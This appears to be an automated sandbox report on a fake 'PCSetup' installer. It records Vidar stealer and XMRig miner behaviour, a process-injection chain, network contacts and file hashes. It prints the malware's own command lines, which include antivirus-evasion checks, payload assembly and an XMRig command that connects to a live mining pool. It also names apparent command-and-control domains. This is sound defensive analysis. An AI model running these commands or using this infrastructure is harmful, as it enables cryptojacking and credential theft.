PID 460 created 3452 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Windows\Explorer.EXE

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\ProgramData\FBKEHJEGCF.exe N/A
N/A N/A C:\ProgramData\HIDAFHDHCB.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 460 set thread context of 2544 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 3108 set thread context of 4464 N/A C:\ProgramData\FBKEHJEGCF.exe C:\Windows\SysWOW64\ftp.exe
PID 3688 set thread context of 952 N/A C:\ProgramData\HIDAFHDHCB.exe C:\Windows\SysWOW64\ftp.exe
PID 952 set thread context of 2972 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2972 set thread context of 2992 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\ProgramData\FBKEHJEGCF.exe N/A
N/A N/A C:\ProgramData\HIDAFHDHCB.exe N/A
N/A N/A C:\ProgramData\FBKEHJEGCF.exe N/A
N/A N/A C:\ProgramData\HIDAFHDHCB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\FBKEHJEGCF.exe N/A
N/A N/A C:\ProgramData\HIDAFHDHCB.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1760 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1760 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1760 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 4408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1816 wrote to memory of 4408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1816 wrote to memory of 4408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1816 wrote to memory of 748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1816 wrote to memory of 748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1816 wrote to memory of 748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1816 wrote to memory of 4632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1816 wrote to memory of 4632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1816 wrote to memory of 4632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1816 wrote to memory of 4120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1816 wrote to memory of 4120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1816 wrote to memory of 4120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1816 wrote to memory of 3016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 3016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 3016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1816 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1816 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1816 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 460 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 1816 wrote to memory of 460 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 1816 wrote to memory of 460 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 1816 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1816 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1816 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 460 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 460 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 460 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 460 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 460 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2544 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\ProgramData\FBKEHJEGCF.exe
PID 2544 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\ProgramData\FBKEHJEGCF.exe
PID 2544 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\ProgramData\FBKEHJEGCF.exe
PID 2544 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\ProgramData\HIDAFHDHCB.exe
PID 2544 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\ProgramData\HIDAFHDHCB.exe
PID 2544 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\ProgramData\HIDAFHDHCB.exe
PID 3108 wrote to memory of 4464 N/A C:\ProgramData\FBKEHJEGCF.exe C:\Windows\SysWOW64\ftp.exe
PID 3108 wrote to memory of 4464 N/A C:\ProgramData\FBKEHJEGCF.exe C:\Windows\SysWOW64\ftp.exe
PID 3108 wrote to memory of 4464 N/A C:\ProgramData\FBKEHJEGCF.exe C:\Windows\SysWOW64\ftp.exe
PID 3688 wrote to memory of 952 N/A C:\ProgramData\HIDAFHDHCB.exe C:\Windows\SysWOW64\ftp.exe
PID 3688 wrote to memory of 952 N/A C:\ProgramData\HIDAFHDHCB.exe C:\Windows\SysWOW64\ftp.exe
PID 3688 wrote to memory of 952 N/A C:\ProgramData\HIDAFHDHCB.exe C:\Windows\SysWOW64\ftp.exe
PID 3108 wrote to memory of 4464 N/A C:\ProgramData\FBKEHJEGCF.exe C:\Windows\SysWOW64\ftp.exe
PID 3688 wrote to memory of 952 N/A C:\ProgramData\HIDAFHDHCB.exe C:\Windows\SysWOW64\ftp.exe
PID 2544 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Windows\SysWOW64\cmd.exe
PID 2544 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Windows\SysWOW64\cmd.exe
PID 2544 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Windows\SysWOW64\cmd.exe
PID 5004 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 5004 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 5004 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4464 wrote to memory of 1780 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 4464 wrote to memory of 1780 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 4464 wrote to memory of 1780 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 952 wrote to memory of 2972 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 952 wrote to memory of 2972 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4464 wrote to memory of 1780 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 952 wrote to memory of 2972 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 952 wrote to memory of 2972 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2972 wrote to memory of 2992 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Revenues Revenues.cmd & Revenues.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 366279

C:\Windows\SysWOW64\findstr.exe

findstr /V "RingtoneRentMicrosoftFocuses" Editors

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Isle 366279\m

C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif

366279\Suspect.pif 366279\m

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif

C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif

C:\ProgramData\FBKEHJEGCF.exe

"C:\ProgramData\FBKEHJEGCF.exe"

C:\ProgramData\HIDAFHDHCB.exe

"C:\ProgramData\HIDAFHDHCB.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIDHCBGDHJK" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
BE 88.221.83.178:443 www.bing.com tcp
US 8.8.8.8:53 178.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 eijWYJUUWJTVUfljdtx.eijWYJUUWJTVUfljdtx udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 theemir.xyz udp
US 172.67.192.32:443 theemir.xyz tcp
US 172.67.192.32:443 theemir.xyz tcp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.169.67:80 c.pki.goog tcp
US 8.8.8.8:53 32.192.67.172.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 172.67.192.32:443 theemir.xyz tcp
US 172.67.192.32:443 theemir.xyz tcp
US 172.67.192.32:443 theemir.xyz tcp
US 172.67.192.32:443 theemir.xyz tcp
US 172.67.192.32:443 theemir.xyz tcp
US 172.67.192.32:443 theemir.xyz tcp
US 172.67.192.32:443 theemir.xyz tcp
US 172.67.192.32:443 theemir.xyz tcp
US 172.67.192.32:443 theemir.xyz tcp
US 172.67.192.32:443 theemir.xyz tcp
US 8.8.8.8:53 businessdownloads.ltd udp
US 104.21.16.123:443 businessdownloads.ltd tcp
US 8.8.8.8:53 123.16.21.104.in-addr.arpa udp
US 172.67.192.32:443 theemir.xyz tcp
US 8.8.8.8:53 i.imgur.com udp
US 199.232.196.193:443 i.imgur.com tcp
US 172.67.192.32:443 theemir.xyz tcp
US 8.8.8.8:53 193.196.232.199.in-addr.arpa udp
US 172.67.192.32:443 theemir.xyz tcp
US 172.67.192.32:443 theemir.xyz tcp
US 52.111.227.14:443 tcp
US 172.67.192.32:443 theemir.xyz tcp
US 172.67.192.32:443 theemir.xyz tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
FI 135.181.22.88:80 135.181.22.88 tcp
US 8.8.8.8:53 88.22.181.135.in-addr.arpa udp
FI 65.109.127.181:3333 tcp
US 8.8.8.8:53 proresupdate.com udp
US 45.152.112.146:80 proresupdate.com tcp
US 8.8.8.8:53 146.112.152.45.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Revenues

MD5 774a97f2c63a28f5b795e0c7f3a1e797
SHA1 2ab25671bd5a2b253d54594301b765f171aa0cd5
SHA256 a08c17ffca06c08afa2bf6ee98a09c08a2cc22a78596497635cb372d644f140d
SHA512 e6c576edbfc972a9272d4fd969dc4e4f82f5ec61be2c526a1e2686cd4ee0734a649c78673f10efd3e3d9ae7b329a440adcd830fcb6bf3f53d30f678e001518d6

C:\Users\Admin\AppData\Local\Temp\Editors

MD5 c06b582d8286115b48f81ec53f36b383
SHA1 4f925d9b551cebda3f898ad18c62925979bcda7e
SHA256 70290025a0c87bcbd58ea8caf22e2dc0104e726ef3a7f9d9649758869def4189
SHA512 c98e48feca40abf3fc22803dcc80c3f7dc11bc8f3ff6fd03a3d733c1acf438294347169887bcbce82ff20fa9a6cbf0a0d94c76dc15bb5989093d1c2f7903864a

C:\Users\Admin\AppData\Local\Temp\Comparisons

MD5 4e292eb85ce9e016ff5a01c719c027c2
SHA1 61b3995398ed8390e8b8dc1a262eb94d55d6b80f
SHA256 6492ab6cd6f8f028f0824e026ed7c5401136f203f7de953bc60f61b32de4b41f
SHA512 9a19f0345059e401fa82e1d90a103438a04b579ccab2667d609f3d7c0764fd91553e6dda65e771fbf3fb059b0e460ad885c22cf39562bacd7e44b4e7bea43ad7

C:\Users\Admin\AppData\Local\Temp\Terminology

MD5 bc54db6ebb67ee3a2e3c127758bc2884
SHA1 4068d9984c207545e62ad464e2134cac265bf9f7
SHA256 8c1e83e582baf2b8232a7ab8e81a751b45d260f4ff01bab2e42783d0e24d6b43
SHA512 a03330c03209d8ef28707854fda4ce7b2b680a374d820d8e699ef980cc6b1e5548eec7c8c86608e3507b3490f38d61f067b25d99d725f10158b9837666aef3cc

C:\Users\Admin\AppData\Local\Temp\Arg

MD5 d4c42c532dceb34e65d7defc682e77dc
SHA1 7584981bc314640ba1b92da552ffeaedc4ea3a21
SHA256 3e7706b03275975037e49a1a7f29e67bce822086f90630948d9528d9c4b68182
SHA512 67ca5bf547b9bda235c44166681cac7e12515fa49b78ee8d7f564fc094c1509e8fe2f2f029a99ec96ab1fbfb1b9c2d501e4e1d65b4855b75639f2974ac804a4b

C:\Users\Admin\AppData\Local\Temp\Bt

MD5 cf6a6e9c0b825f2b1ced20b4ab200db6
SHA1 8d1987c13c8dc1287f0eb631201ca6eee12b4cd0
SHA256 6e4b33cc9c80b969af96b31b1e95588f9cf79e3670951c63172d60d4e1324f95
SHA512 337bca6e3e8e323821d3767feacc10faefb52b4664968e99c1ab62a72f6770f41bc338bfb672e6602249266b141c4e99d004e48adcd87ea308bdec493674dfdc

C:\Users\Admin\AppData\Local\Temp\July

MD5 d71ce9af90d20d69dc3de9bc70f9cacd
SHA1 3b5737986225b7358b909f43a201d4872cd3a294
SHA256 fbbc13426ec699ffd56f6c53bc5e5259e25af602205c3d04beac1d4c578f85da
SHA512 85dfe8e9705b97c6a877b0785394171768dc33effa3a37b9969d35ead669172e6e4eb1357d8c231db778a0b37b2d8253b9e6d170e45959ba24a6b2fac868399e

C:\Users\Admin\AppData\Local\Temp\Ns

MD5 67546d73dfe4d66538a7ac7dc030238f
SHA1 1a3450f06ac594739db273e3eb0155018fccc88e
SHA256 71f45ed46fbd47494a7ecb9b31c07214d99133e35b974f5cf2beceabb639217d
SHA512 f3ceb864801ddb2d7f8298950dd76a0738ab4586796d16290c1c8c11579b9017a9b14c94341c24ac024f89a38e402c81903fcabaa2dddd21ca681af173bf5bb3

C:\Users\Admin\AppData\Local\Temp\Choose

MD5 fb2cc8e690d82366990f2f20a4a5ab75
SHA1 5556232996e954f981144129298e298c75f8c2fe
SHA256 51982155baed7d5006ebc4446a417f320f8d754ec99911fcfa97ee5d37ce7756
SHA512 e8ae811d270bd2de39d0578e84b0001bffaf34969a1fabaedbe804d96eb79919c13578f41af339ce9af26f5cb6cb107bd6d79c1af9aee8a9e359b4b885fde823

C:\Users\Admin\AppData\Local\Temp\Wb

MD5 901d26287ebe3e866d15b610764c49c1
SHA1 13793e6f446a09511642a4f3085cb029a4b853ff
SHA256 c74030e343c6fde4a1f1cf54010c186f9e80b457662bab5500848597c2e19504
SHA512 19ae02941a1a17cbe12c653b3067e10e91e5fe8dd73e0ff2373355eb9ee41af3767ae06885a3fb35bb06e411ec8ac0f291d24e717c01adfcb802539b3cf1f15a

C:\Users\Admin\AppData\Local\Temp\Objects

MD5 f2f3a8cb98474080fdcca6a39b6b3915
SHA1 49f7327ca65d969203be51ccbf9f4033579923d0
SHA256 ca682c8dcdca30548120b6d3194eebf36a9208bef0e9b611da828bd912a38260
SHA512 cde92ed6e3ad806f0acd220990b46168862511222ae3667c62084f93622cc7ba2e91ed3b1e489f5721b8eeba9fc25b5a718febe3718c1afb74fcc6b4f8c0b1b9

C:\Users\Admin\AppData\Local\Temp\Gc

MD5 f446974fde635cadfcc03c9a25fd3780
SHA1 b59e1202f13139f21db4274d65ac51d2a0f8b856
SHA256 5bc7072917151653d7c40e272d8a95a86bbe7ad027eb30a811331a6f7df7ba51
SHA512 cc1a13562df99e2e2a240ad8d8e8d948846c6c5be0c995d87785e3cf73b54824ee7318c423972ea362dafbaac986f19d0117bc7e5192af5a2ff9fc8430bcc1e7

C:\Users\Admin\AppData\Local\Temp\Marcus

MD5 16fcba5d9aed0ef000c886f56cba85ee
SHA1 22584f6b7227ea3e0898233325be3ecb3c7bef6a
SHA256 35d270b74aa68781c8e0bc3cd008718ce362fe9fd32c9ba1ad52b82fe37d07aa
SHA512 7beb4a5207087b0e37f16df84702e4cac8699f951f6a92c7185bc83582766a43ef18bc93af24827793951f2417dd39bdf0717876f75f32feacec93fdfb2896f7

C:\Users\Admin\AppData\Local\Temp\Thus

MD5 08c077a34051a75c2b915a517c5d7d54
SHA1 ecb5cef32ca27ea5542b7416bc550601721f4a32
SHA256 3ed1a12fde96bc80c62d54a0647000dff23a63b987fe8c3faa9e11b4357321a0
SHA512 8746dae03892cee35b1a4463a7765399f2d1d1d989c53d0881043991c4187f7b4b1765376c435ff13722ec6dff2da98287efca0b335508f24d6f1805034e0f70

C:\Users\Admin\AppData\Local\Temp\Broadway

MD5 abfa29a29931ff6299126aed8dd08859
SHA1 c436e000edcc042f7f7889950a610c94d590d36c
SHA256 dd57cfa1ec84ac01cd4aab6dd18046b3a49daf0445ae29d6695c4a25c0bcd59d
SHA512 c0941a5de5fe072ba81b41b555ffdb59c6e0d2b9bed66a0cbb899699c38792cda0bb9857ab0752dbe0b3c966688ccb523989677803bf637675ec435a8c12406e

C:\Users\Admin\AppData\Local\Temp\Shares

MD5 8715208e25afa7a73918e84ee8b27f50
SHA1 61935bc176db5586053d1d5a22dae8092e6a3f7e
SHA256 f0eba5c2f4c9998b0a491a7ec4fc953e601235709b3536ba1a928e8d5021d3f1
SHA512 461d9e809ede59c71cd7fd9aa90a8ad991c5c9504d5c9c53659604e7e0e25b02d2135fbc0b2c4ab0e4a60bd43c38fa1109559d5f19f58a387dbe8e03424230c8

C:\Users\Admin\AppData\Local\Temp\Talk

MD5 bb769ef1b8aa0b58d0b94c4804bcd418
SHA1 e6f4dc5a736038e5604e282046d1234ccabebf68
SHA256 ae766919ddefe1340cea9b4ae3acfc041e8d079baa7fcf7dca59dfa3330c2d59
SHA512 2d0e600f59a545b1d19f299a8b756bab334b02be8e9f6e1ff2d3f64c18362bcb60239b0786358023728be88c8e033219e9df500d30b3121921d356055c60bb05

C:\Users\Admin\AppData\Local\Temp\Pda

MD5 0766c0db71d9a82456e72ca071518676
SHA1 be36286b20cc0aeff00bdca079dfa9f4047e1ac0
SHA256 5553cf5ed1753ab9749bb7f3057f0db8cb9f19b8f673fa977b038ca0fef8b3d1
SHA512 032dad0b91b5482d5d1e558ba9e4dfea6f16c71725d21865f411f888fe631628f7a16a3e9fc367d88c02fde7f6ef7fd56a717c23feb45eb1ff5968605fb7fb77

C:\Users\Admin\AppData\Local\Temp\Roy

MD5 6310218145bc5ec965e5953fb0305d19
SHA1 b6043e6b47ea99b13efea5b2b7c523248379f6af
SHA256 ae7d0d86b3505a9c5c40bce3fd2554102e4f7d21aa5bdcc10451ce1019606629
SHA512 ae82e5721644c9f51852c5973dec9e250b83593b4079c7d3360e55700c75e43f9cac36de508654831c37e4d4ffdfcc8aabe8d681bcfd7a3a72d8d3f3df0fe6ec

C:\Users\Admin\AppData\Local\Temp\Atlanta

MD5 05bf6c32a8d3cb1025a4e8baca686fc5
SHA1 e32584b21803cf8bed34367c8e4f34ff6104d6c4
SHA256 61460bebb1a3ada4d197a869a8d9637eaf03656b32509e5a4606240d06ab3361
SHA512 c93b4c23daf481e9ebcb8d19d1381e3a7ab49b1708e0340a9455a11fc26b3209577cc831e7610d212a0e677b8f6217855038b1cf0b2379f397549b92cbf89b03

C:\Users\Admin\AppData\Local\Temp\Gis

MD5 e5e509038d8029cc95879ae96199093c
SHA1 18fceacd1cf5c57c6c2f1dc59a05906b740323a0
